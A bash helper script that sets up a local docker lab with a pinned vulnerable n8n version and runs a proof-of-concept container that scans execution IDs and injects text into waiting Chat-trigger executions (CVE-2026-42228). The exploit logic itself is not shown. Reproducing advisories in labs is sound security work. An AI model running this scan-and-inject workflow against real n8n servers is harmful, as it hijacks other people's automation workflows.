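#!/usr/bin/env bash
# ──────────────────────────────────────────────────────────────────────────────
# exploit.sh — one-shot helper for GHSA-f77h-j2v7-g6mw
#
# Drives the accompanying docker-compose lab: a pinned vulnerable n8n image
# (compose service "n8n-vuln") and the PoC container (compose service "poc").
#
# Usage:
#   ./exploit.sh setup                      # pull images, build PoC, start n8n target
#   ./exploit.sh scan                       # scan exec IDs 1-200 with default payload
#   ./exploit.sh scan 1 500                 # scan a custom range
#   ./exploit.sh attack <exec-id>           # attack a specific execution ID
#   ./exploit.sh attack <exec-id> "custom payload"
#   ./exploit.sh logs                       # tail n8n target logs
#   ./exploit.sh clean                      # stop & remove everything
# ──────────────────────────────────────────────────────────────────────────────
set -euo pipefail

# TARGET_INTERNAL is how the poc container reaches n8n on the compose network;
# TARGET_LOCAL is the host-published port the operator opens in a browser.
readonly TARGET_INTERNAL="http://n8n-vuln:5678"
readonly TARGET_LOCAL="http://localhost:5678"
readonly DEFAULT_PAYLOAD="[CVE-2026-42228] hijacked by PoC"
# Upper bound (seconds) for the health-check wait in `setup`; without it the
# original loop spun forever when the container never became healthy.
# Constructed value — adjust for slow hosts.
readonly HEALTH_TIMEOUT=120

#######################################
# Print the usage block to stderr and exit non-zero.
# (The original grepped this file's own '#' lines, which also echoed any
# comment added elsewhere in the script and relied on GNU sed's '\?'.)
#######################################
usage() {
  cat >&2 <<'EOF'
Usage:
  ./exploit.sh setup                      pull images, build PoC, start n8n target
  ./exploit.sh scan                       scan exec IDs 1-200 with default payload
  ./exploit.sh scan 1 500                 scan a custom range
  ./exploit.sh attack <exec-id>           attack a specific execution ID
  ./exploit.sh attack <exec-id> "custom payload"
  ./exploit.sh logs                       tail n8n target logs
  ./exploit.sh clean                      stop & remove everything
EOF
  exit 1
}

# Print a diagnostic to stderr and exit 1.
die() {
  printf '[!] %s\n' "$*" >&2
  exit 1
}

# Abort unless the command named in $1 is on PATH.
require() {
  command -v "$1" >/dev/null 2>&1 || die "'$1' not found in PATH"
}

# Abort unless $2 is a non-negative integer; $1 names the value in the error.
# Execution IDs are handed to the poc container as an integer range, so
# anything else would only surface as a confusing failure inside it.
require_uint() {
  [[ "$2" =~ ^[0-9]+$ ]] || die "$1 must be a non-negative integer, got '$2'"
}

#######################################
# Block until the n8n-vuln container reports a healthy state.
# Globals:  HEALTH_TIMEOUT (read)
# Outputs:  progress dots to stdout
# Returns:  0 when healthy; exits via die() after HEALTH_TIMEOUT seconds
#######################################
wait_healthy() {
  local waited=0
  until docker inspect --format='{{.State.Health.Status}}' n8n-vuln 2>/dev/null \
      | grep -q healthy; do
    if (( waited >= HEALTH_TIMEOUT )); then
      die "n8n-vuln not healthy after ${HEALTH_TIMEOUT}s (see: ./exploit.sh logs)"
    fi
    printf '.'
    sleep 2
    waited=$(( waited + 2 ))
  done
  echo
}

# setup: pull the pinned vulnerable image, build the PoC image, start the target.
cmd_setup() {
  echo "[*] Pulling vulnerable n8n image (1.123.22) ..."
  docker compose pull n8n-vuln
  echo "[*] Building attacker image ..."
  docker compose build poc
  echo "[*] Starting vulnerable n8n target ..."
  docker compose up -d n8n-vuln
  echo
  echo "[*] Waiting for n8n to become healthy ..."
  wait_healthy
  echo "[+] n8n is up at $TARGET_LOCAL"
  echo
  echo "  Next steps:"
  echo "    1. Open $TARGET_LOCAL and complete the setup wizard"
  echo "    2. Create a workflow with a Chat trigger node"
  echo "    3. Set the Chat trigger Auth = None and activate the workflow"
  echo "    4. Open the Chat and send a message to put the execution in 'waiting' state"
  echo "    5. Run: ./exploit.sh scan"
}

# scan [start] [end]: run the poc container over an execution-ID range.
cmd_scan() {
  local start_id="${1:-1}"
  local end_id="${2:-200}"
  require_uint start-id "$start_id"
  require_uint end-id "$end_id"
  (( start_id <= end_id )) || die "start-id ($start_id) must not exceed end-id ($end_id)"
  echo "[*] Scanning execution IDs $start_id → $end_id against $TARGET_INTERNAL"
  docker compose run --rm poc \
    --target "$TARGET_INTERNAL" \
    --start-id "$start_id" \
    --end-id "$end_id" \
    --inject "$DEFAULT_PAYLOAD"
}

# attack <exec-id> [payload]: run the poc container against one execution ID.
cmd_attack() {
  # ':?' aborts with the usage hint when no ID is given (non-interactive shell).
  local exec_id="${1:?Usage: ./exploit.sh attack <exec-id> [payload]}"
  local payload="${2:-$DEFAULT_PAYLOAD}"
  require_uint exec-id "$exec_id"
  echo "[*] Attacking execution $exec_id ..."
  docker compose run --rm poc \
    --target "$TARGET_INTERNAL" \
    --exec-id "$exec_id" \
    --inject "$payload"
}

# clean: tear down containers, network and volumes created by the compose file.
cmd_clean() {
  echo "[*] Stopping and removing lab containers, network, and volumes ..."
  docker compose down -v
  echo "[+] Done."
}

#######################################
# Dispatch on the subcommand in $1; remaining args go to the subcommand.
# Both the docker CLI and the compose plugin are checked up front, since every
# subcommand except `logs` fails late and noisily without the latter.
#######################################
main() {
  require docker
  docker compose version >/dev/null 2>&1 || die "'docker compose' plugin not available"
  local cmd="${1:-}"
  (( $# == 0 )) || shift
  case "$cmd" in
    setup)  cmd_setup ;;
    scan)   cmd_scan "$@" ;;
    attack) cmd_attack "$@" ;;
    logs)   docker compose logs -f n8n-vuln ;;
    clean)  cmd_clean ;;
    *)      usage ;;
  esac
}

main "$@"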